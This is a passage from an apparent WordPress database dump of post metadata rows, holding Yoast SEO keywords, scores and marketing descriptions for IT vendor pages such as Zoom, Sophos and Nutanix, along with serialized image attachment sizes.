Conferencing Solutions'),(2519,2003,'_yoast_wpseo_linkdex','48'),(2520,2024,'_yoast_wpseo_metadesc','BlueJeans is the meeting platform for the modern workplace. We bring video, audio and web conferencing together with the collaboration tools people use every day.'),(2521,1528,'_yoast_wpseo_focuskw','HP DESIGNJET Printer'),(2522,1528,'_yoast_wpseo_linkdex','21'),(2523,1620,'_yoast_wpseo_content_score','60'),(2524,1620,'_yoast_wpseo_focuskw','zoom'),(2525,1620,'_yoast_wpseo_metadesc','ZOOM FOR THEÂ CONFERENCE ROOMSIMPLE, FLEXIBLE SET UP, Build the room you need with the hardware you want on top on Zoomâ€™s cloud-based platform.'),(2526,1620,'_yoast_wpseo_linkdex','83'),(2527,1618,'_yoast_wpseo_focuskw','WinRAR'),(2528,1618,'_yoast_wpseo_metadesc','WinRAR is an archiving utility that completely supports RAR and ZIP archives and is able to unpack CAB, ARJ, LZH, TAR, GZ, ACE, UUE, BZ2, JAR, ISO, 7Z, Z archives. It consistently makes smaller archives than the competition, saving disk space and transmission costs.'),(2529,1618,'_yoast_wpseo_linkdex','82'),(2530,1618,'_yoast_wpseo_content_score','30'),(2531,1617,'_yoast_wpseo_content_score','60'),(2532,1617,'_yoast_wpseo_focuskw','Western Digital'),(2533,1617,'_yoast_wpseo_metadesc','DATA READINESS CAN LEAD TO BUSINESS TRANSFORMATION'),(2534,1617,'_yoast_wpseo_linkdex','60'),(2535,1612,'_yoast_wpseo_content_score','60'),(2536,1612,'_yoast_wpseo_focuskw','Watchguard'),(2537,1612,'_yoast_wpseo_linkdex','75'),(2538,1609,'_yoast_wpseo_content_score','60'),(2539,1609,'_yoast_wpseo_focuskw','Veritas'),(2540,1609,'_yoast_wpseo_linkdex','60'),(2541,1599,'_yoast_wpseo_content_score','60'),(2542,1599,'_yoast_wpseo_focuskw','STORAGECRAFT'),(2543,1599,'_yoast_wpseo_metadesc','You stake your companyâ€™s reputation on the technologies you use. When customers are happy and see the value you bring, you see higher revenue and face less challenge from competition. Our data protection and storage solutions focus on helping you succeed. Fast, reliable recovery. Flexible managed services licensing. Support for physical and virtual systems. Centralized management. No wonder ShadowProtectÂ®Â is considered the best recovery solution in the market.'),(2544,1599,'_yoast_wpseo_linkdex','83'),(2545,2165,'_wp_attached_file','2018/12/Cloud-Services-Component-560x373_0.jpeg'),(2546,2165,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:656;s:6:\"height\";i:373;s:4:\"file\";s:47:\"2018/12/Cloud-Services-Component-560x373_0.jpeg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"Cloud-Services-Component-560x373_0-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"Cloud-Services-Component-560x373_0-300x171.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:47:\"Cloud-Services-Component-560x373_0-300x150.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:47:\"Cloud-Services-Component-560x373_0-480x300.jpeg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:47:\"Cloud-Services-Component-560x373_0-640x373.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:45:\"Cloud-Services-Component-560x373_0-20x11.jpeg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2547,2166,'_wp_attached_file','2018/12/Disaster-Recovery-Component-1.jpg'),(2548,2166,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:656;s:6:\"height\";i:373;s:4:\"file\";s:41:\"2018/12/Disaster-Recovery-Component-1.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Disaster-Recovery-Component-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Disaster-Recovery-Component-1-300x171.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:41:\"Disaster-Recovery-Component-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:41:\"Disaster-Recovery-Component-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:41:\"Disaster-Recovery-Component-1-640x373.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:39:\"Disaster-Recovery-Component-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2549,2167,'_wp_attached_file','2018/12/ShadowProtect-Tab1_34266093.jpg'),(2550,2167,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:770;s:6:\"height\";i:390;s:4:\"file\";s:39:\"2018/12/ShadowProtect-Tab1_34266093.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"ShadowProtect-Tab1_34266093-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"ShadowProtect-Tab1_34266093-300x152.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"ShadowProtect-Tab1_34266093-768x389.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:39:\"ShadowProtect-Tab1_34266093-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:39:\"ShadowProtect-Tab1_34266093-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:39:\"ShadowProtect-Tab1_34266093-640x390.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:390;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:37:\"ShadowProtect-Tab1_34266093-20x10.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:10;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2551,1612,'_yoast_wpseo_metadesc','SOLUTIONS THAT EVOLVE AS INDUSTRY NEEDS CHANGE'),(2552,1609,'_yoast_wpseo_metadesc','THE NEW NETBACKUP. THE BEST JUST GOT BETTER. BUSINESS CONTINUITY, Defy disasters and outages. Keep your business running.'),(2553,1598,'_yoast_wpseo_content_score','60'),(2554,1598,'_yoast_wpseo_focuskw','Sophos'),(2555,1598,'_yoast_wpseo_linkdex','67'),(2556,1598,'_yoast_wpseo_metadesc','IT security products have become as complex as the networks theyâ€™re trying to secure. At Sophos we know that the solution to complexity is not more complexity. We tackle security challenges with clarity and confidence, knowing that simple security is better security.'),(2557,2177,'_wp_attached_file','2018/12/ironwolf-mo-b-14tb-vn0008-front-200x200.png'),(2558,2177,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:51:\"2018/12/ironwolf-mo-b-14tb-vn0008-front-200x200.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"ironwolf-mo-b-14tb-vn0008-front-200x200-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:51:\"ironwolf-mo-b-14tb-vn0008-front-200x200-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:49:\"ironwolf-mo-b-14tb-vn0008-front-200x200-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2559,1581,'_yoast_wpseo_content_score','30'),(2560,1581,'_yoast_wpseo_focuskw','Seagate'),(2561,1581,'_yoast_wpseo_linkdex','77'),(2562,1579,'_yoast_wpseo_metadesc','Sage Business Cloud is all you\'ll ever need to help your small or medium-sized business grow faster.'),(2563,1579,'_yoast_wpseo_content_score','60'),(2564,1579,'_yoast_wpseo_focuskw','sage'),(2565,1579,'_yoast_wpseo_linkdex','71'),(2566,1581,'_yoast_wpseo_metadesc','For everything NAS, thereâ€™s IronWolf and IronWolf Pro always on, always working.Built for multi-user environments and high workload rates, these NAS hard drives are enhanced with AgileArray technology for optimal reliability and system scalability.'),(2567,1578,'_yoast_wpseo_focuskw','Ruckus'),(2568,1578,'_yoast_wpseo_metadesc','Small and medium-size businesses (SMBs) rely on worry-free, high-performance Wi-Fi to spark growth and boost productivity. With Ruckus, Wi-Fi for businessÂ is both easy and affordable. Turn any space into a workspace with dependable network coverage. Easily set up different types of secure guest networks on the fly to engage with customers, partners, suppliers, and contractors. Ruckus access points (APs) and switches offer superior coverage and capacity, so you can grow without going over budget.Â '),(2569,1578,'_yoast_wpseo_linkdex','41'),(2570,1578,'_yoast_wpseo_content_score','60'),(2571,1576,'_yoast_wpseo_focuskw','Qnap'),(2572,1576,'_yoast_wpseo_metadesc','Whether starting out or growing; businesses require a rock-solid IT infrastructure that will ensure that they have the right tools, hardware and potential to continue growing. And out of all the elements in an IT base, storage is the lifeblood that keeps a company moving forward. QNAP provides a full range of cutting-edge network-attached storage devices that not only fulfill storage needs, but also provide a wide range of services and features to greatly increase the productivity and options of your business.'),(2573,1576,'_yoast_wpseo_linkdex','88'),(2574,1576,'_yoast_wpseo_content_score','60'),(2575,2191,'_wp_attached_file','2018/12/main_image02.jpg'),(2576,2191,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:967;s:6:\"height\";i:265;s:4:\"file\";s:24:\"2018/12/main_image02.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"main_image02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"main_image02-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"main_image02-768x210.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"main_image02-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"main_image02-480x265.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"main_image02-640x265.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"main_image02-20x5.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:5;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2577,2192,'_wp_attached_file','2018/12/main_image03.jpg'),(2578,2192,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:967;s:6:\"height\";i:265;s:4:\"file\";s:24:\"2018/12/main_image03.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"main_image03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"main_image03-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"main_image03-768x210.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"main_image03-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"main_image03-480x265.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"main_image03-640x265.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"main_image03-20x5.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:5;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2579,1570,'_yoast_wpseo_content_score','30'),(2580,1570,'_yoast_wpseo_focuskw','Panasonic HD VISUAL COMMUNICATIONS SYSTEM GLOBAL'),(2581,1570,'_yoast_wpseo_linkdex','62'),(2582,1570,'_yoast_wpseo_metadesc','The Panasonic HD Visual Communications System is a new visual communication tool that is clearly different from previous videoconference systems. High image quality, high sound quality, and a stable connection have been achieved both with intranets and the Internet, enabling easy, comfortable communication between remote locations. The technologies that Panasonic has accumulated from its AV devices serve as the core of this system.'),(2583,2195,'_wp_attached_file','2018/12/Image-2a_1_0.jpg'),(2584,2195,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:420;s:4:\"file\";s:24:\"2018/12/Image-2a_1_0.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Image-2a_1_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Image-2a_1_0-300x105.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:105;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Image-2a_1_0-768x269.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Image-2a_1_0-1024x358.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:358;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Image-2a_1_0-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Image-2a_1_0-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Image-2a_1_0-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Image-2a_1_0-20x7.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:7;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2585,2196,'_wp_attached_file','2018/12/Image-4b_0.jpg'),(2586,2196,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:420;s:4:\"file\";s:22:\"2018/12/Image-4b_0.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Image-4b_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Image-4b_0-300x105.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:105;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Image-4b_0-768x269.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Image-4b_0-1024x358.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:358;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Image-4b_0-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Image-4b_0-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Image-4b_0-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Image-4b_0-20x7.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:7;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2587,2197,'_wp_attached_file','2018/12/CF-MX4_bannerimage_v2_0_0_0.jpg'),(2588,2197,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:419;s:4:\"file\";s:39:\"2018/12/CF-MX4_bannerimage_v2_0_0_0.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"CF-MX4_bannerimage_v2_0_0_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"CF-MX4_bannerimage_v2_0_0_0-300x105.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:105;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"CF-MX4_bannerimage_v2_0_0_0-768x268.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:268;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"CF-MX4_bannerimage_v2_0_0_0-1024x358.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:358;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:39:\"CF-MX4_bannerimage_v2_0_0_0-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:39:\"CF-MX4_bannerimage_v2_0_0_0-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:39:\"CF-MX4_bannerimage_v2_0_0_0-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:36:\"CF-MX4_bannerimage_v2_0_0_0-20x7.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:7;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2589,1567,'_yoast_wpseo_focuskw','Nutanix ENTERPRISE CLOUD SOLUTIONS'),(2590,1567,'_yoast_wpseo_linkdex','54'),(2591,1567,'_yoast_wpseo_content_score','60'),(2592,2200,'_wp_attached_file','2018/12/homestory-desktop.png'),(2593,2200,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1184;s:6:\"height\";i:1794;s:4:\"file\";s:29:\"2018/12/homestory-desktop.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"homestory-desktop-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"homestory-desktop-198x300.png\";s:5:\"width\";i:198;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"homestory-desktop-768x1164.png\";s:5:\"width\";i:768;s:6:\"height\";i:1164;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"homestory-desktop-676x1024.png\";s:5:\"width\";i:676;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"homestory-desktop-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:29:\"homestory-desktop-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:29:\"homestory-desktop-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:27:\"homestory-desktop-13x20.png\";s:5:\"width\";i:13;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2594,1567,'_yoast_wpseo_metadesc','Nutanix Enterprise Cloud combines the agility and simplicity of the public cloud, with the security and control you need in a private cloud. Built on the industryâ€™s leadingÂ hyperconverged infrastructureÂ (HCI) technology, it integrates compute, storage, virtualization and networking in a full-stack solution that runs nearly any application.'),(2595,1439,'_yoast_wpseo_metadesc','Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.'),(2596,1439,'_yoast_wpseo_focuskw','Apple'),(2597,1439,'_yoast_wpseo_linkdex','79'),(2598,1445,'_yoast_wpseo_content_score','30'),(2599,1445,'_yoast_wpseo_focuskw','Barracuda'),(2600,1445,'_yoast_wpseo_metadesc','Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft.'),(2601,1445,'_yoast_wpseo_linkdex','90'),(2602,1448,'_yoast_wpseo_content_score','30'),(2603,1448,'_yoast_wpseo_focuskw','Bitdefender'),(2604,1448,'_yoast_wpseo_metadesc','Bitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats.'),(2605,1448,'_yoast_wpseo_linkdex','90'),(2606,1486,'_yoast_wpseo_content_score','30'),(2608,1486,'_yoast_wpseo_focuskw','Epson'),(2609,1486,'_yoast_wpseo_metadesc','Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots.'),(2610,1486,'_yoast_wpseo_linkdex','73'),(2611,1483,'_yoast_wpseo_content_score','60'),(2612,1483,'_yoast_wpseo_focuskw','Ergotron'),(2613,1483,'_yoast_wpseo_metadesc','Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical 